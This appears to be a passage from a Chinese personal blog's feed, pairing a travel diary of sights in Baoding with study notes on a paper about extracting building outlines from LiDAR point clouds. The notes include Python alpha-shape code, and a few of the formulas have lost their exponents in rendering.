    ​ 不知道保定在民国时期有什么故事?感觉没啥故事硬蹭……

    12:53 电影海报

    jpg

    电影海报

    ​ 80-90 年代的电影海报?

    12:55 民国招牌

    jpg

    民国风

    ​ 依旧是民国风情的招牌。

    12:56 假木牌

    jpg

    假木牌

    ​ 于是乎逛了一圈,实在觉得无趣,配不上它所宣传的效果,果然保定这个地方就是个美食荒漠……最后还是在对面的汇博解决的午饭……花了 30 元吃了份羊肉泡馍。

    ​ 由于阳哥把自己的自行车骑过来了,只好再硬着头皮陪阳哥骑回学校……

    14:53 狼牙山五壮士纪念碑

    jpg

    双拥广场

    ​狼牙山五壮士(1941),八路军晋察冀军区第 1 军分区 1 团 7 连 6 班,为在河北省保定市易县狼牙山战斗中英勇抗击日军和伪满洲国军的八路军 5 位英雄,他们是马宝玉、葛振林、宋学义、胡德林、胡福才,他们用生命和鲜血谱写出一首气吞山河的壮丽诗篇。

    10.13

    07:05 日出

    jpg

    太阳东升

    ​ 雾霾一大好处——看日出的时候不会刺眼。

    10:50 中国古动物博物馆

    jpg

    能见度极低的中国古动物博物馆

    ​ 国庆 8 天长假后就是 7 天连上班,天天泡电脑前人确实有点吃不消了……于是决定偷跑出去吸雾霾了。打算骑去淮军公所,再不去免费开放的时间就过去了!

    ​ 途径中国古动物博物馆,一个国家级的博物馆一直迟迟不开放……

    11:07 京门虎踞

    jpg

    京门虎踞

    ​ 听说保定人很恨北京人,但是他们还是得把靠近北京当作自己的招牌。

    11:21 淮军公所

    jpg

    中国古戏楼博物馆

    ​古戏楼,是中国古代戏曲的表演场所,是中国古代剧场的组成部分。中国剧场历史悠久,形式多样,数量庞大,分布广泛。从先秦时期的摆地为场到汉唐时期的亭台楼阁,从宋元时期的专门性剧场瓦舍勾栏,再到清代的神庙、宗祠、宫廷、茶园戏楼,不断细分的演出场地形态在物换星移中记录着中国传统戏曲的兴盛,也见证着戏台上的人间百态。中华戏曲源远流长,从原始祭祀舞蹈到标志戏曲形成的南戏,繁荣的北杂剧、明清传奇,再到剧种繁多的地方戏,共同聚合成百花齐放的中华戏曲大观园。建于光绪年间的保定淮军昭忠祠暨公所戏楼是古代建筑艺术与戏曲表演艺术的有机结合,是清代会馆戏楼的典范。
    ​本陈列由古代戏楼、公所戏楼、中国戏曲三个部分组成,勾勒出中国古戏楼的发展变迁,历史内涵,以及雅俗共赏、博大精深的中国戏曲的历史风姿和丰富内涵。

    ​ 一阵骑终于来到了淮军公所的招牌——中国古戏楼博物馆!

    11:24 敕建李文忠公祠

    jpg

    李文忠和昭忠祠有什么关系?(后注:李鸿章谥号)

    ​淮军公所地处保定古城区西南隅的淮军公所全称“淮军昭忠祠暨公所”,是李鸿章任直隶总督兼北洋大臣后,于光绪十四年至光绪十七年(1888 年—1891 年)经专折奏准,奉诏修建的“淮军昭忠祠”及“公所”(淮军办公驻地)合一的建筑群,占地约 30 亩。此祠是继苏州、无锡、武汉之后为祭奠在战斗中阵亡的淮军将士修建的第四座“昭忠祠”,也是规模最宏大的一座。淮军公所位于保定市环城西路 220 号,是李鸿章为纪念淮军在镇压太平天国和捻军阵亡的“将士”而建的昭忠祠,并兼有安徽会馆之功能。李鸿章死后改为李鸿章祠堂。

    ​ 怪不得是个徽式建筑,但是我感觉还是像北方建筑的风格。

    11:37 望荷亭

    jpg

    望荷亭

    ​ 崭新的望荷亭。

    11:37 荷花

    jpg

    ​ 快到了晚秋,居然还有一种荷花没有完全凋谢。

    11:40 园林

    jpg

    小湖

    ​ 淮军公所的后花园。

    11:44 碑文

    jpg

    石碑

    ​ 如果是真的话,保存得还蛮完好。

    11:45 巷口

    jpg

    小巷

    ​ 感觉有点当年去恭王府的感觉。

    11:48 展览

    png

    保定戏曲

    ​ 博物馆里展示的大都是仿制的物品,不过设计得还是蛮用心的。

    ​保定是国家历史文化名城,是一个孕育、繁衍了多个地方剧种的戏剧之乡。目前近 20 个剧种被列入国家级、省级、市级非物质文化遗产名录,是祖国戏曲长河中特色鲜明的璀璨明珠。
    ​保定戏曲源远流长。金代,建于定兴东林寺的戏楼,元代,以关汉卿为代表的保定籍元杂剧作家群;明代,众多的戏曲乐户,晚清和民国时期,戏曲大融合、大调整及京剧、评剧、豫剧等大剧种的传唱;抗战时期,晋察冀根据地的“大众戏剧”运动;新中国成立后,戏曲的全面改革发展,共同勾勒出保定戏曲的发展轨迹。
    ​保定地方戏曲异彩纷呈。高阳河西村是北方昆曲的诞生地,定兴的祥泰班是河北梆子早期科班之一,在全国具有一定影响的地方剧种保定老调亦生于斯、长于斯;彪炳史册、光耀星空的戏曲名家数不胜数;厚植于民间的自娱自乐戏曲团体更是数以千计,丰厚的戏曲资源彰显着保定的文化底蕴。
    ​本展从保定戏曲的源流,保定老调的魅力,保定地方剧种、唱腔、艺术家等多个维度铺展出“无处不弦歌”的保定戏曲画卷。

    ​ 至于保定戏曲,应该跟京剧大差不差吧。

    11:51 戏楼

    jpg

    戏楼

    ​ 被翻新得蛮气派的戏楼。

    11:56 雕塑

    jpg

    雕塑

    ​ 被翻新得蛮气派的雕塑。

    12:37 保定古玩市场

    ​ 出来了,看着时间还早,打算再去光园转转。结果告诉我还在维修……那就再去曹锟戏楼打个卡好了。

    jpg

    ​ 保定古玩市场,可以进去回收古玩、粮票、钱币之类的。

    12:41 曹锟戏楼

    jpg

    ​关岳行宫俗称“老爷庙”,“曹锟大戏台”,为国内唯一一座同时供奉关羽和岳飞的庙宇。早在元太宗十三年(公元 1241 年)始建的关岳行宫,初时称“武安王庙”。经明、清两代的重修,到民国初年由坐镇保定的大总统曹锟作为直系大本营,将关岳行宫修建的愈增规模。行宫里曹锟亲自撰书的“佛光普照”碑,此碑高约 1.74 公尺 , 宽约 0.75 公尺矗立。这宏伟庑殿,宽敞的戏楼经过多年的尘封,仍然保留,成为国内著名的历史遗迹之一。

    ]]>
    @@ -4650,7 +4650,7 @@ /posts/Paper-Building%20outline%20extraction%20from%20ALS%20point%20clouds%20using%20medial%20axis/ - 资源

    原文

    Abstract

    ​ 由于建筑物出现的多样性和复杂性,从城市环境的机载激光雷达点云数据中自动提取和描绘建筑物仍然是一项具有挑战性的任务。中轴变换(MAT)能够描述对象的几何形状和拓扑结构,但从未应用于建筑屋顶轮廓提取。它通过对象的中心线或骨架结构而不是边界来表示对象的形状。

    ​ 我们提出了一种稳定的、基于 MAT 的方法来检测建筑 corner point,然后将这些 corner point 连接起来形成建筑边界多边形。

    • 首先,我们对通过 alpha-shape 算法获取的一组建筑边缘点的 2D MAT 进行近似,以导出所谓的建筑屋顶骨架 (building roof skeleton)。
    • 然后,我们提出了一种分层的 corner point 感知分割方法,根据骨架点的特性,即所谓的分离角、最大内切圆的半径和定义边缘点索引,对骨架点进行聚类。
    • 从每个片段,通过基于片段内的骨架点位置外推零半径内切圆的位置来估计 corner point。

    ​ 结果表明,骨架化 (skeletonization) 是一种很有前途的工具,可以从远非完美的地理点云数据中提取建筑物轮廓的相关几何信息。

    1. Introduction

    ​ 绘制建筑屋顶轮廓,也称为建筑足迹,对于数字基础地图制图、规划、监控、基础设施管理和可持续城市设计至关重要。

    ​ 人造城市物体(建筑物、道路、运河)通常具有对称的形状,具有直线和锐角。这样的特性使得能够从 ALS 点云中自动提取边界轮廓。

    png

    MAT 骨架(蓝线)直观地检测位于骨架和对象边界(黑线)相交处的角点(红点)。

    ​ **中轴变换(MAT)**是一种强大的形状提取技术,它提供了紧凑的几何表示,同时保留了输入形状的拓扑特性。MAT 由 Blum 引入,用于描述生物形状。好家伙 1967 年的……然而,MAT 有一个根本的缺点,那就是它对输入形状的小扰动的不稳定性,这可能会干扰 MAT 分支的拓扑。

    ​ 角是重要的局部特征,关于其位置的知识可以最大限度地减少进一步的数据处理,而不会丢失原始物体形状的特定特征。在给定城市地区的空中点云的情况下,我们提出了一种基于 MAT 描述符的精确屋顶角点自动提取建筑轮廓的方法。

    ​ 随着人们对 GIS(地理信息系统)数字地图产品的兴趣增加,从各种遥感数据中提取建筑轮廓的开发工作也得到了加强。

    ​ 文献中发现的 MAT 或骨架的各种定义对应于计算 MAT 的不同方法,导致具有不同性质的不同结果。通常,MAT 算法通常侧重于推导表面中心线或中轴的几何位置,即所谓的骨架化。到目前为止,文献中有许多骨架化方法及其在二维和三维物体描述中的应用。现有的骨架化方法通常分为四种主要方法:

    • 基于形态学细化的方法
    • 使用平面形状的中轴变换的基于几何的方法
    • 基于距离的函数
    • 由函数而不是使用距离函数生成的一般场函数

    ​ Ma 等人使用基于最近邻居和法线的收缩球方法估计 3D 中轴点,收缩球算法不仅准确且计算高效,而且被认为是现有最简单、最快速的曲面骨架化方法。

    3. Methodology

    ​ 我们的研究重点是 MAT 的自适应,用于从地图和空间建模所需的噪声点云数据中提取建筑轮廓。我们扩展了迭代收缩球算法的工作,并开发了一种利用骨架特征的策略,以实现精确提取建筑轮廓的目标。

    ​ 本文还提出了一种新的骨骼点分割方法。所提出的方法在处理有噪声的表面边界和重建建筑轮廓方面达到了最先进的水平。通过优化基于骨架的特征的使用,它需要最少的人机交互。具体而言,我们的工作贡献如下:

    • 我们集成了骨架衍生特征和全局特征,以执行处理不同点密度和噪声水平的鲁棒骨架点(MAT)分割。
    • 我们结合有序的表面点索引和骨骼衍生特征来检测角点。
    • 我们介绍了使用骨骼衍生特征来准确估计建筑拐角位置。

    png

    提出的提取建筑轮廓的方法学工作流程

    ​ 由于本研究需要在二维空间中使用 MAT,我们采用了 Ma 等人的二维收缩圆算法。我们提出的自动提取建筑屋顶轮廓的方法的一般工作流程由下面的主要步骤组成。

    • (b),通过 alpha-shape 算法提取建筑物边界点。
    • (c),使用 2D 收缩圆算法将边界点转换为其 2D MAT 或骨架点。
    • (d),我们应用我们的 MAT 分割,通过利用它们的几何属性来分割 MAT 点。
    • (e),使用这些线段来检测角点
    • (f ),基于检测到的角点进行多边形化,形成二维闭合多段线。

    png

    矩形骨架(蓝线)及其相应的内切圆(灰色)和中轴点 c(红色点)。

    ​ 本研究使用了扩展收缩圆方法,该方法实现了 Peters 提出的去噪启发式方法。我们将物体表面 $\mathbf S$ 的骨架定义为 $\mathbf S$ 中最大内切圆 $B(c,\rho )$ 的一组中心点 $c$,其中 $\rho$ 表示该圆的半径。

    ​ 2D 骨架点也称为中轴点。通过将圆半径 $\rho$ 函数与中轴点集相关联,我们获得了所谓的中轴变换(MAT)。

    ​ 如上图所示:

    • 中轴点(红色点)形成矩形对象 $\mathbf S$ 的 MAT 骨架(蓝色线)。
    • 每个最大内切圆(灰色)至少接触 $\mathbf S$(黑色轮廓)边界的两个点。
    • 任何非最大圆或未内切于 $\mathbf S$(绿色圆)的圆心都将被忽略,不被视为中轴点。

    3.1 Alpha-shape

    给定分割的建筑点,创建建筑轮廓从 Edelsbruner 引入的 alpha-shape 算法的边界点选择开始。众所周知,alpha-shape 能够以所需的细节水平保留有限点集的小形状细节。2D alpha 形状是基于输入点的 2D Delaunay 三角测量构建的。该方法识别根据参数 $\alpha\ge 0$ 定义的边界点,该参数控制边界形状的细节级别。给定平面上的一组点 $S$ 和 $\alpha$ 的值,该算法的工作原理如下:

    1. 计算 $S$ 的 Delaunay 三角剖分 $DT(S)$。$DT(S)$中的所有边都是 alpha 形状 $S_\alpha$ 的候选边。

    2. 对于具有端点 $p$ 和 $q$ 的 $DT(S)$ 的所有边 $e$:

      a. 找到半径为 $\alpha$ 的两个圆 $B_{pq1}$ 和 $B_{pq2}$,其中心 $c_{pq}(1)$ 和 $c_{pq}(2)$ 包含相同边 $e$ 的端点 $p$ 和点 $q$。这些圆根据以下圆心定义:

      $c_{pq}(1,2)=\left(\frac{x_p+x_q}{2}\pm\sqrt{\alpha2-\left(\frac{||e||}{2}\right)2}\left(\frac{y_p-y_q}{2}\right),\frac{y_p+y_q}{2}\pm\sqrt{\alpha2-\left(\frac{||e||}{2}\right)2}(\frac{x_p-x_q}{2}) \right)$

      其中 $||e||$ 是端点 $p$ 和 $q$ 之间的长度。

      b. 如果至少有一个圆的内部不包含来自 $S$ 的点,则 $e$ 是有效的边界边,

      png

      否则该边将被删除。

      png

      1. 所有有效边界边的并集形成 $\alpha$ 形状 $S_\alpha$

        png

    ​ $\alpha$ 的值是一个实数,$0\le \alpha\le\infty$。当 $\alpha$ 接近 $0$ 时,形状可能会收缩,形成孔洞,并可能变得不连续。在极端情况下,$\alpha=0$ 的值会导致数据点本身。当 $\alpha$ 向无穷大增加时,$\alpha$ 形状接近点集 $S$ 的凸包。

    ​ 在我们的研究领域,我们根据经验决定 $\alpha$ 值介于 $0.3$ 和 $0.5$。

    3.2. The shrinking circle principles

    ​ 给定曲面 $S$ 上具有相应法向量 $N$ 的一组噪声边点 $V$。MAT 点被定义为 $S$ 中与边界 $S$ 相切的最大内切圆 $\mathbf B(c, \rho)$ 的中心 $c$ 和相应半径 $\rho$ 的集合。圆 $\mathbf B$ 和相应圆心 $c$ 分别表示为中间圆和中间轴点。

    png

    缩圆算法应用于有噪声建筑边缘的基本原理。

    缩圆法的基本原理如下:

    1. 中间圆在至少两个点 $(p,q)$ 上接触表面,其中 $p,q\in \mathbf S$。

    2. 沿着由边点 $p$ 的法向量 $N_p$ 定义的线,圆 $\mathbf B_p$ 的半径 $\rho$ 迭代减小,直到 $\mathbf B_p$ 在 $q$ 处接触 $\mathbf S$,其中 $q\ne p$,圆心 $c$ 在通过 $N_p$ 的线上。如果找到最大 $\mathbf B_p$ 圆,则迭代停止。

    3. 中间圆是一个最大的空圆,这意味着它不包含任何表面点。

    3.3. Skeletal points extraction

    ​ 为了获得表面 $\mathbf S$ 的 MAT,计算中轴点 $c(p)$。因此,通过以下步骤计算 $\mathbf S$ 中所有采样点 $p$ 的最大内切圆 $\mathbf B$:

    1. $p$ 的初始圆 $\mathbf B_{init}$ 是基于初始半径 $\rho_{init}$ 定义的。$\rho_{init}$ 值设置得足够大,例如等于两个输入点之间的最大距离。

    2. 给定 $\rho^{\mathbf k}{\mathbf p}$,其中 $k={1,2,…,i}$ 表示第 $k$ 个迭代步骤,圆心 $\mathbf c^{\mathbf k}{\mathbf p}$ 由下式给出:

      $c^{\mathbf k}{\mathbf p}=\mathbf p-\mathbf N{\mathbf p}\rho^{\mathbf k}_{\mathbf p}$

    3. 找到最接近 $c^{\mathbf k}{\mathbf p}$ 的曲面点 $q^\mathbf k\mathbf p\in S$,使得 $q^{\mathbf k}_{\mathbf p}\ne p$

    4. $q^{\mathbf k}_{\mathbf p}$ 和 $p$ 定义的圆的圆最大值测试:

      a. 如果从 $c^{\mathbf k}{\mathbf p}$ 到 $q^{\mathbf k}{\mathbf p}$ 的距离等于圆的半径 $\rho^{\mathbf k}{\mathbf p}$,则圆 $\mathbf B^{\mathbf k}{\mathbf p}$ 最大,并且$c^{\mathbf k}_{\mathbf p}$ 是中轴点。

      b. 否则,使用以下方程计算下一个收缩圆的半径 $\rho^{\mathbf k+1}_{\mathbf p}$:

      $\rho^{\mathbf k+1}{\mathbf p}=\frac{d(p,q{k+1})}{2\cos\theta{k+1}{p}}$

      其中:

      $\cos\theta{k+1}_p=\frac{N(p-q{k+1})}{d(p, q^{k+1})}$

    png

    ​ 当找到步骤 (a) 中描述的中轴点时,迭代将停止。

    ​ (a) 显示了在点 $p$ 处接触 $S$ 的圆的连续收缩,这在最后一次迭代中产生了中间圆 $B^i_p$ 和中间轴点 $c^i_p$。

    ​ 给定一个定义的内表面和外表面 $S$,MAT 由两个组成部分组成:

    • 一部分内表面 $\mathbf S(N_p)$,由所谓的内中轴点组成
    • 另一部分外表面 $\mathbf S(-N_p)$,外中轴点。

    ​ 对于每个 $p\in\mathbf S$,通过迭代步骤 2 到 4 来计算相应的内部和外部 MAT 点。向内法线 $N_p$ 用于内部 MAT 计算,而向外法线 $–N_p$ 用于外部 MAT 计算。

    1. $\cos\theta{k+1}_p=\frac{N(p-q{k+1})}{d(p, q^{k+1})}$

    png

    ​ 图 (b) 显示了用于计算内圈(黑色箭头)和外圈(红色箭头)的中轴点 $c_p$ 和法向矢量 $N_p$ 的方向的几何结构。

    ​ 噪声处理是克服 MAT 对噪声边界的敏感性的重要步骤。在输入表面上存在小凸起或噪声的情况下,圆可能收缩过多,从而可能导致不期望的中轴点。这种过度收缩的圆通常具有较小的分离角 $\alpha$。分离角 $\alpha$(见 b)是线 $p-\mathbf c_{\mathbf p}$(连接点 $p$ 和中轴点 $\mathbf c_p$ 的线)和线 $q-\mathbf c_\mathbf p$(连接点 $q$ 和中轴点 $\mathbf c_\mathbf p$ 的线)之间的角度。

    $ \cos $ $ \alpha $ = $ \frac {\overrightarrow {c_ {p}p}.\overrightarrow {c_ {p}q}}{|\overrightarrow {c_ {p}p|}\cdot |\overrightarrow {c_ {p}}q|} $

    ​ 在上述收缩方法期间。好圆被定义为收缩方法中分离角 $\alpha_k$ 大于分离角阈值 $\alpha_{min}$ 的最后一个圆。

    ​ 在这一步骤之后,每个中轴点 $\mathbf c_{\mathbf p}$ 都具有许多属性。每个 MAT 点 $\mathbf m_{\mathbf p}$ 的属性是中轴点 $c_p$、半径 $\rho$、分离角 $\alpha$、表面点 $p$ 和 $q$ 的索引以及法向量 $N_p$ 或 $-N_p$。从理论上讲,使用这些 MAT 属性,可以完全重建 $\mathbf S$ 的几何。

    3.4. MAT point segmentation

    ​ MAT 属性提供了丰富的信息,可用于将 MAT 点分组为不同的内侧段或分支。

    ​ 为了进一步应用 MAT,识别 MAT 点连通性的两个有用观察结果如下:

    • 朝向同一转折点或拐角的 MAT 点被视为一个线段。下图中正方形 $\mathbf S$ 的精细采样表面点。产生精细 MAT 点,其中一些 MAT 点逐渐接近特定转折点。从这个意义上说,从最大内切圆创建的每个 MAT 点,在表面点 $p$ 和 $q$ 处接触,指定一个转折点,该转折点位于表面点 $p$ 与 $q$ 之间。如 (b) 所示,两个表面点 $p$、$q$(红色文本)的中值与角的索引(76)相似。

    png

    • MAT 点的分离角 $\alpha$ 预计接近 $90^\circ$。如 (c) 所示,矩形的 MAT 点具有分布在 $90^\circ$ 左右的分离角。

    png

    ​ 在实践中,表面点不是完美分布的、无噪声的,不像下图所示那样规则。(a) 表面边界上的小扰动会产生所谓的骨架噪声。在检测形状角点时,骨骼噪声可能会引起虚假片段,从而导致虚假角点。

    png

    ​ 我们的分割标准依赖于边界点的转折点位置的接近度。直观地,彼此靠近并且具有相似特征值的 MAT 点被分组在一起。此外,我们预计半径 $\rho$ 将沿着线段分支逐渐变化。

    ​ 基于上述观察,我们使用三个全局阈值和四个 MAT 衍生特征来分割 MAT 点。全局阈值与 MAT 无关,定义全局阈值是为了提高分割精度。全局阈值为:

    • G.1. 距离物体表面 $\mathbf S$ 的缓冲区距离 $bf$。只有位于指定缓冲区内的 MAT 点才会被考虑用于分割。该阈值用于排除由具有向外法线的两个边缘点的最大圆产生的不可用的外部 MAT 点。这些 MAT 点是远离曲面点的典型噪声。

    • G.2. 每个线段的最小点数 minPts。任何点少于给定 minPts 的线段都被视为线段噪声。

    • 点索引间隔 $\Delta pt$ 设置两个候选角点之间的最小距离:$\Delta pt\ge \frac{l}{r}-2$

      • $l$ 是所需的最小边缘长度。
      • $r$ 是点云间隔。
      • 点索引间隔 $\Delta pt$ 准则是为了避免在短边界和噪声边界的情况下,在确定的最小边长处出现虚假或额外的角。

      例如,给定一组具有 $0.5m$ 点云间隔 $r$ 的点,我们需要提取最小长度 $l=2.5m$ 的建筑边缘,因此,$\Delta pt$ 设置为 $3$。

      想象一下,下图中的点 13 与点 11、16 和 20 具有相同的中间性质。点 13 将不被视为角点,因为它与点 11 的点差小于 3。

    png

    噪声点边缘可能指示错误的拐角。

    ​ 从 MAT 属性派生的自定义特征或 MAT 派生的特征描述如下:

    • F.1. 考虑分离角 $\alpha$ 接近 $90^\circ$ 的 MAT 点 $\mathbf m_{\mathbf p}$ 进行分割。这里的“闭合”由分离角差值阈值 $\partial \alpha$ 指定。给定的 $\partial \alpha$ 阈值之外的 MAT 点被视为骨架噪声。这意味着,如果 MAT 点 $\mathbf m_{\mathbf p}$ 的分离角 $α_\mathbf p$ 在 $90^\circ + \partial \alpha$ 和 $90^\circ - \partial \alpha$ 之间,则将考虑对其进行分割。

    • F.2. 每个边点 $p\in\mathbf S$ 都被赋予一个唯一的索引。对于角点感知分割,期望具有相似特征的 MAT 点 $\mathbf m_{\mathbf p}$ 属于同一聚类。

      $med_{pq}=p_{idx}+\frac{q_{idx}-p_{idx}}{2}$

      例如,上图中的 $p_{idx}=13$ 和 $q_{idx}=19$ 导致 $med_{pq}=16$。具有相似 $med_{pq}$ 值的不同 MAT 点可能属于同一 MAT 段。

    • F.3. 点 $p_i$ 的法线与上一点 $p_{i−1}$ 的法线和下一点 $p_{i+1}$ 的法线之间的法线角差 $\delta N$分别由($|N_p−N_{p_{i−1}}|$)和($|N_p−N_{p_{i+1}}|$)定义。

    • F.4. 最大中位指数差值阈值 $\partial K_p$。此功能用于避免由于曲面上的扰动或噪声(特别是在拐角附近)而导致的伪拐角和附加分段。

    ​ 给定一组 MAT 点 $M={(c_p,\rho,\alpha,p,q,N)}$,每个中轴点 $c_p$ 具有 6 个特征 $\rho,\alpha,p,q,N$,MAT 点分割工作如下:

    1. 使用全局阈值 G.1 选择位于距离物体表面 $\mathbf S$ $bf$ 的特定缓冲距离内的 MAT 点 $m_\mathbf p$。

    2. 仅选择 MAT 衍生特征 F.1 指定的具有可接受分离角 $\mathbf \alpha_p$ 的 MAT 点 $\mathbf m_{\mathbf p}$。

    3. 使用 MAT 导出的特征 F.2 计算来自步骤 2 的滤波 MAT 点的中值$med_{pq}$。

    4. 识别所有可能的候选角 $K_r$ 并将它们放在列表 $K_1、K_2…$ 中。

    5. 给定来自步骤 3 的候选角 $K_r$,该算法搜索中值与 $r_{idx}$ 相似的 MAT 点。

    6. 如果 $|med_{pq}−r_{idx}|≤\Delta pt$,则 MAT 点 $\mathbf m_\mathbf p$被分配给中间段$\mathbf{Mseg}®$。

    7. 如 G.2 中所定义,任何成员点少于 $minPts$ 的内侧节段 $\mathbf{Mseg}$ 都将被移除。该步骤将消除边缘出现缺陷时可能形成的假线段。

    ​ 接下来使用内侧段来估计真实的角,其中一个内侧段对应于一个角。

    3.5. Corner point estimation

    ​ 我们不是将边缘点指定为角,而是基于中轴点的位置及其相应的半径来估计角的位置。MAT 点的最大内切圆的半径 $\rho$ 将朝着拐角逐渐减小。

    3.6. Building outline evaluation metrics

    ​ 应用两种不同的评估指标来评估所提出的工作流在满足要求方面的性能。

    ​ 建筑外形规格:转角几何精度和转角检测精度。

    ​ 位置精度,也称为几何位置精度或位置精度,用作测量建筑物多边形在绝对地理参考系统中相对于其真实位置的定位情况的主要指标。

    ​ 我们使用 RMSE(均方根误差)来测量参考和结果中建筑转角位置(X 和 Y 坐标)之间的平方差的平均值。针对所有检测到的建筑转角,计算完整建筑相对于相应参考转角位置的 RMSE。

    $$RMSE_x=\frac{\sqrt{\Sigma(X_{res}-X_{ref})^2}}{n}$$

    $$RMSE_y=\frac{\sqrt{\Sigma(Y_{res}-Y_{ref})^2}}{n}$$

    $$RMSE_r=\sqrt{RMSEx2+RMSEy2}$$

    $X_{res}$,$Y_{res}=$ 得到的角点坐标

    $X_{ref}$, $Y_{ref}=$ 地面实况中角点的坐标

    $n=$ 角点总数

    ​ 由于某些建筑的复杂性,并不是所有的角落都能被完全检测到。因此,我们通过三种检索测量来评估拐角检测的准确性:召回率、精确度和 F1 分数。精确性用于衡量准确性或保真度,而回忆则用于衡量完整性。F1 分数是精确度和召回率的加权平均值。

    $$Perception = \frac{TP}{TP+FP}$$

    $$Recall=\frac{TP}{TP+FN}$$

    $$F1-score=\frac{2\cdot Percision\cdot Recall}{Percision+Recall}$$

    png

    ​ 在上图中的建筑多边形中,正确角的数量($TP$)为 4,而错误角的数量$FP$(绿色椭圆内)为 1,未检测到的角或偏移超过一米的角的数量 $FN$(如蓝色圆圈所示)为 2。

    该配置的 $P=0.8$,$R=0.67$,$F1=0.73$。

    png

    4. Results and discussions

    4.1. Experiments of the study areas

    ​ 在实验中,我们使用了三个具有不同景观特征和机载激光雷达点云规范的研究区域。

    4.2. General overview

    png

    4.3. Comparison analysis

    png

    4.4. Computational and complexity analysis

    ​ 分析时间复杂度。

    5. Conclusions and recommendations

    Alpha Shape 算法

    import numpy as np
    import matplotlib.pyplot as plt
    from mpl_toolkits.mplot3d import Axes3D
    from scipy.spatial import Delaunay
    from sklearn.neighbors import KDTree
    def plot_circle(centers, rs, ax):
    N = centers.shape[0]
    for i in range(N):
    theta = np.arange(0, 2 * np.pi, 0.01)
    x = centers[i,0] + rs[i] * np.cos(theta)
    y = centers[i,1] + rs[i] * np.sin(theta)
    ax.plot(x, y, 'b-', alpha=0.1)

    ​ 函数 plot_circle 用于绘制圆形。

    ​ 它接受三个参数:centers 表示圆心的坐标,rs 表示圆的半径,ax 为 matplotlib 中的 Axes 对象,用于绘图。

    • 代码首先获取 centers 数组的形状,确定要绘制多少个圆。然后通过 for 循环遍历所有圆心。

    • 在每次循环中,

      • 首先使用 np.arange 生成一个从 0 到 2π 的 theta 数组,步长为 0.01。这个数组表示圆的角度。
      • 然后根据圆的参数计算出每个角度对应的 x 和 y 坐标。具体来说,
        • x 坐标是圆心的 x 坐标加上半径乘以角度的余弦值,
        • y 坐标是圆心的 y 坐标加上半径乘以角度的正弦值。

    ​ 最后使用 ax.plot 绘制出这些点,连接成一个圆形曲线。参数 ‘b-’ 表示蓝色实线,alpha=0.1 表示透明度为 0.1。

    ​ 这样,通过不同的圆心和半径,可以在图像上绘制出多个圆形。

    def edge_check_vaild(e, tree, r, err):
    xp = e[0]
    xq = e[1]
    L = np.sqrt(np.dot(xq-xp, xq-xp))
    if L > 2 * r:
    return False, -1
    vec = (xq-xp) / L # the vector from p to q
    normal = np.array([vec[1],-vec[0]])
    c1 = (xp + xq) / 2 + normal * np.sqrt(r**2-(L/2)**2)
    c2 = (xp + xq) / 2 - normal * np.sqrt(r**2-(L/2)**2)
    c = np.array([c1,c2])
    count = tree.query_radius(c, r=r+err, return_distance=False, count_only=True, sort_results=False)
    if count[0] <= 2:
    return True, c[0]
    elif count[1] <= 2:
    return True, c[1]
    else:
    return False, -1

    ​ 函数 edge_check_vaild 用于检查边缘是否合法,也就是检查连接两点的线段是否符合圆的半径要求。

    ​ 它接受四个参数:e 表示边、tree 表示点云的 KDTree,r 表示圆的半径,err 表示检查误差。

    • 代码首先提取出两个端点的坐标 xp 和 xq,然后计算出边的长度 L。如果 L 大于 2r,那么这条边一定无法构成圆形,因此直接返回 False。
    • 如果 L 小于等于 2r,那么说明这条边有可能是圆的一部分。可以根据端点的坐标计算出连接它们的单位向量 vec,以及垂直于该向量的法向量 normal。然后通过中垂线的方程,求得圆心 c1 和 c2。
    • 接下来,使用 KDTree 的 query_radius 方法,查询以 c1 和 c2 为圆心,半径为 r+err 的圆内有多少个点。
      • 如果点的数量小于等于 2,那么说明这是一个有效的边缘。返回 True 以及圆心的坐标 c1 或 c2(视情况而定)。
      • 如果点的数量大于 2,则说明这个圆不是有效的圆,因为至少包含了三个点。返回 False 和 -1 表示无效边缘。
    def boundary_extract(points, alpha, err=10e-3):
    """
    Here, parameter err was place, because there are errors when calculating distance
    meanwhile, this err was different for different scaling 2D point cloud
    so, a parameter was placed here to considering the calculation errors
    """
    R = 1 / alpha
    pts = np.copy(points)
    tree = KDTree(pts, leaf_size=2)
    tri = Delaunay(pts)
    s = tri.simplices
    N = s.shape[0]
    i = 0
    edges = []
    centers = []
    while i <= N - 1:
    if s[i,0]==-1:
    i = i + 1
    continue
    p3 = s[i]
    e1 = np.array([points[p3[0],:], points[p3[1],:]])
    e2 = np.array([points[p3[1],:], points[p3[2],:]])
    e3 = np.array([points[p3[0],:], points[p3[2],:]])
    e = [e1,e2,e3]
    for j in range(3):
    flag, center = edge_check_vaild(e[j], tree, R, err)
    if flag:
    edges.append(e[j])
    centers.append(center)
    nb = tri.neighbors[i]
    nb_valid = nb[nb!=-1]
    i = i + 1
    return edges, centers

    ​ 函数 boundary_extract 用于从 2D 点云中提取边界。它接受三个参数:points 表示点的坐标数组,alpha 表示半径与平均边长比值的倒数,err 表示计算误差。

    • 首先根据给定的点云数据构建 KDTree 和 Delaunay 三角剖分。然后遍历每个三角形,对于三角形的每条边,调用 edge_check_valid 函数检查它是否符合圆形要求,并将符合要求的边缘和圆心加入到 edges 和 centers 列表中。
    • 最后返回边缘列表和圆心列表。

    ​ 需要注意的是,这里的 err 参数是因为计算距离时可能存在误差。实际上,在某些情况下,由于计算精度问题,同样的点云数据、相同的参数 alpha 可能会得到不同的结果。因此,如果发现提取边界的结果与预期不符,可以尝试调整 err 参数或重新生成点云数据。

    def show_edge(edges, points, circle=None, r=None):
    fig = plt.figure()
    ax = fig.add_subplot(111)
    ax.scatter(*zip(*points), s=4, c='k')
    for i in range(len(edges)):
    ax.plot(*zip(*edges[i]), '-r')
    if circle is not None:
    plot_circle(circle, r, ax)
    plt.show()

    ​ 函数 show_edge 用于可视化提取的边缘。它接受四个参数:edges 表示边缘列表,points 表示点的坐标数组,circle 表示圆心坐标,r 表示圆的半径。

    ​ 函数首先创建一个新的图表,并使用 scatter 方法绘制出点云。然后遍历边缘列表,使用 plot 方法绘制出边缘。如果指定了圆心坐标和半径,调用 plot_circle 函数将圆形绘制出来。

    ​ 最后使用 show 方法展示图表。

    if __name__ == "__main__":
    pts = np.random.rand(200, 2) # 随机生成 10 个 2 维点
    alpha = 6
    edges, centers = boundary_extract(pts,alpha, err=10e-5)
    show_edge(edges,pts,circle=np.array(centers), r=np.ones(len(centers)) / alpha)

